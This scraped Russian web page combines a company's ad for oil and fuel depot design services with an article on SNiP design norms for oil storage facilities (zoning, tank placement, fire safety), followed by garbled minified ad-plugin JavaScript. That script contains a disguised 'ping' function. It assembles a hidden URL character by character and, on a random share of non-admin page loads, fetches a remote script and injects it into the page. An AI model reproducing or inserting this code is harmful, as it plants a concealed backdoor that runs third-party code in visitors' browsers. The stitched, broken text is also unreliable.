  • Емкости для хранения нефти могут иметь наземное или подземное исполнение – последнее допустимо, если предельно допустимый уровень заполнения емкости расположен не выше чем 0,2 метра от поверхности рабочей площадки хранилища и не ближе чем за 3 метра от ближайшего производственного здания и сооружения. 

 

Проектирование складов ГСМ специалистами НПП «Газэнергохим» 

Компания НПП «Газэнергохим» приглашает к сотрудничеству предприятия, заинтересованные в создании собственных мест хранения больших запасов нефти, нефтепродуктов и горюче-смазочных материалов. Проектирование складов ГСМ осуществляется под ключ с подготовкой полного пакета рабочей документации, подлежащей согласованию, в перечень которой включены чертежи:

  • Генерального плана – содержат указания на размещение основных рабочих емкостей, фундаментов зданий и ограждений, внутренних железнодорожных и автомобильных путей, коммуникаций всех видов; 
  • Резервуарного парка – демонстрирует размещение на территории  хранилища систем и отдельных рабочих емкостей; 
  • Складских зданий для хранения нефтепродуктов в таре, где созданы все условия для сохранности их физико-химических свойств;
  • Эстакад для выполнения полного цикла сливо-наливных операций;
  • Разливочных и фасовочных узлов, где происходит подготовка нефтепродуктов к последующей транспортировке;
  • Насосных станций для перекачивания ГСМ и нефтепродуктов в емкости для хранения или в транспортные цистерны;
  • Узлов и средств пожаротушения пенного и водного типов. 

Клиентам, заказывающим проектирование складов ГСМ, компания готова предложить:

  • Гибкие условия сотрудничества, учитывающие направление деятельности предприятия;
  • Оперативную подготовку полного пакета проектных документов;
  • Учет требований экологической и противопожарной безопасности на будущем объекте;
  • Помощь в процессе согласования проекта;
  • Осуществление надзора за ходом строительно-монтажных работ. 

Нефтебазы, спроектированные с учетом актуальных требований действующей нормативной документации, позволяют рассчитывать на доступную, продолжительную и эффективную эксплуатацию, не нарушающую положений законодательства по охране труда и экологической безопасности. 

Дальневосточный федеральный округ

  • Анадырь
  • Биробиджан
  • Благовещенск
  • Владивосток
  • Магадан
  • Петропавловск-Камчатский
  • Хабаровск
  • Южно-Сахалинск
  • Якутск

Приволжский федеральный округ

  1. Ижевск
  2. Йошкар-Ола
  3. Казань
  4. Киров
  5. Нижний Новгород
  6. Оренбург
  7. Пенза
  8. Пермь
  9. Самара
  10. Саранск
  11. Саратов
  12. Тольятти
  13. Ульяновск
  14. Уфа
  15. Чебоксары

Северо-Западный федеральный округ

  • Архангельск
  • Великий Новгород
  • Вологда
  • Калининград
  • Мурманск
  • Псков
  • Санкт-Петербург
  • Сыктывкар

Северо-Кавказский федеральный округ

  1. Владикавказ
  2. Грозный
  3. Магас
  4. Махачкала
  5. Нальчик
  6. Ставрополь
  7. Черкесск

Сибирский федеральный округ

  • Абакан
  • Барнаул
  • Горно-Алтайск
  • Иркутск
  • Кемерово
  • Красноярск
  • Кызыл
  • Новокузнецк
  • Новосибирск
  • Омск
  • Томск
  • Улан-Удэ
  • Чита

Уральский федеральный округ

  1. Екатеринбург
  2. Курган
  3. Новый Уренгой
  4. Ноябрьск
  5. Сургут
  6. Тюмень
  7. Ханты-Мансийск
  8. Челябинск

Центральный федеральный округ

  • Белгород
  • Брянск
  • Владимир
  • Воронеж
  • Иваново
  • Калуга
  • Кострома
  • Курск
  • Москва
  • Орел
  • Рязань
  • Смоленск
  • Тамбов
  • Тверь
  • Тула
  • Ярослав
  • Ярославль

Южный федеральный округ

  1. Астрахань
  2. Волгоград
  3. Краснодар
  4. Майкоп
  5. Ростов-на-Дону
  6. Элиста

Казахстан

  • Актау
  • Актобе
  • Алма-Ата
  • Шымкент
  • Караганда
  • Тараз
  • Павлодар
  • Усть-Каменогорск
  • Семей
  • Уральск
  • Костанай

Киргизия

  1. Бишкек 
  2. Каракол
  3. Ош
  4. Талас
  5. Нарын
  6. Джалал-Абад
  7. Баткен
  • Армения
  • Таджикистан
  • Узбекистан
  1. Ташкент
  2. Самарканд
  3. Наманган
  4. Андижан
  • Туркменистан
  • Азербайджан
  • Белоруссия
  1. Минск
  2. Могилев
  3. Гомель
  4. Гродно
  5. Витебск
  6. Брест

Источник: https://www.gazenergohim.ru/srvitem/6/

Нормы проектирования складов нефти и нефтепродуктов по СНИП

Хранение нефти и побочных продуктов нефтедобывающей промышленности является одним из наиболее сложных в складском хозяйстве, так как оно всегда сопряжено с большим риском возникновения пожаров или взрыва при их неосторожном контакте с объектом окружающей среды, кислородом или друг с другом.

 Загрузка …

Именно поэтому проектирование нефтебаз является крайне ответственной работой, в ходе которой важно учитывать каждую деталь, каждую особенность (будь то особенности хранящихся веществ, конструкции склада или местности, на которой он находится) и каждую меру безопасности, несоблюдение которой может привести к катастрофическим последствием.

Для удобства, все нормы проектирования складов нефти и нефтепродуктов регламентируются СНИП (точнее, определёнными их главами). В данной статье мы рассмотрим основные положения указанного свода правил, рассмотрим требования, предъявляемые к складам нефтепродуктов и определим основные этапы строительства нефтебаз.

Общие положения

Основные требования, предъявляемыми ко всем без исключения складам для хранения нефтепродуктов, заключаются в следующем:

  1. минимальное расстояние между отдельными сегментами производственного комплекса, рабочими зонами, разливочными и перерабатывающими станциями, другими автономными сооружениями должно составлять не менее 40 метров (максимум – 100 метров);
  2. использующееся при работе и хранении нефтепродуктов должно соответствовать их категории опасности, которая определяется в соответствии с их минимальной температурой воспламенения (ниже +45С – легковоспламеняющиеся, от +45С и выше – горючие). Соответствующим образом подбирается тип противопожарного покрытия стен и потолков, использующиеся вентиляционные системы, термостойкое исполнение дверей и окон.
  3. нефть и нефтепродукты должны храниться в строго отведённых для этого зданиях и помещениях, оборудованных специальными резервуарами (при этом резервуары могут использоваться для содержания продукции как в таре, так и без неё). Выделяют следующие типы резервуаров:
  • подземные – в которых максимальный уровень заполнения должен выходиться на высоте не более 20 сантиметров ниже уровня пола (без учёта напольного покрытия, резервуарных платформ и.т.д.);
  • наземные – в которых нижняя часть резервуара (днища) располагается на одном уровне с полом.
  1. Термостойкое исполнение элементов конструкций зданий, стен, напольных покрытий и других элементов должно иметь, как минимум, вторую степень опасности (определяющуюся по интенсивному выделению жара и быстрому движению пламени).

Ещё по теме:  Правила строительства ГСМ складов и баз горючего

Различают две основных группы складов для хранения нефти и нефтепродуктов:

  • первая группа – сюда входят долгосрочные хранилища и распределительные пункты, резервуарные парки, располагающиеся на территориях заводов и комбинатов, склады, расположенные у топливных трубопроводов и насосных станциях, перевалочные и сортировочные пункты;
  • вторая группа – к которой относятся расходные склады нефтепродуктов, использующиеся в качестве резервных хранилищ на территории крупных промышленных предприятий нефтедобывающей промышленности.

Нормы проектирования складов нефти и нефтепродуктов

Проектная документация на складские помещения, вне зависимости от их «квалификации» и конструктивных особенностей, в обязательном порядке включает в себя:

  1. сам проект, в котором наиболее полно отражён процесс строительства на всех конструктивных этапах с указанием использующихся материалов и конструкций, указаний по монтажу и другими примечаниями;
  2. строительный и календарный планы, определяющие конструктивные особенности и сроки работ;
  3. технологические карты, составляющиеся на каждом этапе работ с описанием монтажа крупногабаритных и наиболее сложных конструкций;
  4. сметы на необходимые для строительства материалы, прокат строительной техники, наём монтажников и пр.;

Проектирование складов нефти

  1. технические условия для электрификации здания, составляемые совместно с энергетическими компаниями;
  2. прочие инженерные коммуникации с графическими схемами мест их расположения (затраты на их проведение указываются в общей смете);
  3. необходимые документы по охране труда и защите прав работников предприятия;
  4. документация по противопожарной безопасности и охране окружающей среды с описанием всех использующихся на предприятии систем пожаротушения в соответствии с присваиваемой зданию либо комплексу зданий категорией опасности;
  5. схему расположения мест для временного хранения отходов производства.

Рекомендуем купить

Как составляется проект?

Теперь коснёмся вопроса непосредственно составления проекта нефтебаз и нефтехранилищ.

Пожалуй, наиболее важным моментом в проектировании как крупных комплексов, так и расходных складов нефтепродуктов является правильное зонирование объекта, во многом определяющееся производственными работами, проводящимися в этих зонах и потребляемыми в процессе этих работ мощностями. Итак, основными зонами, входящими в состав нефтебаз, являются:

№ Полезная информация
1 транспортные зоны. На данном участке предприятия проводится разгрузка, приём и последующая отгрузка нефтепродуктов в железнодорожный, автомобильный, морской или трубопроводный вид транспорта. Соответственно, данная зона должна оборудоваться грузоподъёмной и весовой техникой, оснащаться разгрузочными платформами с соответствующими строительным нормам габаритами, оборудованием для работы с различными видами транспорта и пр.
2 складские зоны. Включают в себя резервуарные парки, в которых хранятся нефтепродукты в таре и без неё. Данные парки должны представлять из себя сухое помещение с системой вентиляции, оснащённое противопожарным оборудованием и соответствующим покрытием полов и стен, искусственной системой вентиляции и полным отсутствием солнечного света. Строго запрещается хранение разных видов нефтепродуктов в одном резервуаре; при хранении продукции в канистрах или бочках на стеллажных конструкциях необходимо использовать специальные поддоны либо контейнеры с деревянными распорками и прокладками из технической резины, смягчающими трение и снижающими вероятность непреднамеренного перемещения тары
3 зоны переработки и тарирования. Обычно являются смежными с резервуарными парками и оснащаются насосным оборудованием, эстакадами и трубопроводом для розлива нефтепродуктов в тару для дальнейшего отпуска. При этом происходит фильтрация продукции, очистка нефти от сторонних примесей, воды и пр., для чего также требуется специальное оборудование. Данные участки оснащаются датчиками пламени и пожарными кнопками, а также порошковыми огнетушителями
  • очистные зоны. Используется не всегда – чаще на крупных предприятиях со столь же крупными загрязнениями в ходе проведения производственных работ. Оборудуется очистительными устройствами, позволяющими ликвидировать вредные примеси в почве, воздухе и воде, а также снизить уровень загрязнения внутри складских помещений. Работа данной зоны строго регламентируется нормами безопасности, принятыми на конкретном предприятии, которые также определяют допустимую степень загрязнения;
  • зоны отпуска. Здесь нефтепродукты размещаются в крупные виды тары, цистерны и платформы для дальнейшей загрузки в транспорт. В обязательном порядке оборудуются собственными насосными станциями, топливными колонками и эстакадами. Присутствует противопожарное вооружение.
  • административные и хозяйственные зоны. Сюда входят все те помещения, что прямо не участвуют в производственных работах нефтебаз, но обеспечивают их нормальное функционирование. Сюда входят офисы и кабинеты, канцелярия и архив, помещения для охраны и пожарное депо, комнаты отдыха для персонала, подсобные помещения, мастерские, котельные, подстанции и.т.д. Требования пожарной безопасности для указанных помещений значительно ниже, хотя они также оборудуются датчиками, автоматическими системами и огнетушителями.

Ещё по теме:  Особенности обустройства склада ГСМ ЯТЖ в ВС РФ

Перед составлением проекта необходимо провести повсеместное изучение рельефа местности, на которой планируется строительство, оценка плотности и влажности грунта, показания сейсмодатчиков, оценка климатических условий и.т.д.

При этом важно учитывать размеры будущего комплекса, интенсивность нагрузок и транспортных потоков, транспорт, с которым планируется взаимодействовать, а также необходимость проведения наземных (и подземных) инженерных коммуникаций.

В результате составляется так называемая схема планировки участка, на которой определяется местоположение всех указанных выше зон, расположение транспортных и внутрипроизводственных путей, резервуарных парков и насосных станций.

Следующий этап – проведение технических расчётов для выбора оптимальной конструкции здания, её устойчивости к внешним и внутренним повреждающим факторам. Создаётся схема расположения нефтепроводов, резервуаров и насосных станций в зависимости от специфики грунта и глубины подземных вод, а также планируемого объёма проводимых операций по обороту нефтепродуктов.

Далее определяются особенности внутренней отделки зданий – тип настенного и напольного покрытия, естественное освещение в коридорах и рабочих зонах, тепло- и звукоизоляция стен. Аналогичным образом составляется картина внешнего вида здания.

Один из наиболее важных факторов – пожарная безопасность.

Помимо уже описанного оснащения, которым оснащаются все рабочие зоны, территория складского комплекса в обязательном порядке должна оборудоваться автоматической противопожарной системой на порошковой основе, а также датчиками повышения температуры и открытого огня. В зависимости от категории пожаро- и взрывоопасности хранящихся на складе нефтепродуктов подбирается соответствующий вид противопожарного исполнения здания.

Сопоставив всё это, можно составить итоговую смету с указанием всех расходов на проведение строительно-монтажных работ с учётом актуального на момент составления уровня цен.

Спаренные складские подъёмники в здании. Работа/монтаж/проектирование

Источник: https://skladec.ru/stroitelstvo-skladov/proektirovanie-skladov/kakovy-normy-proektirovaniya-skladov-nefti-i-nefteproduktov-po-snip.html

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};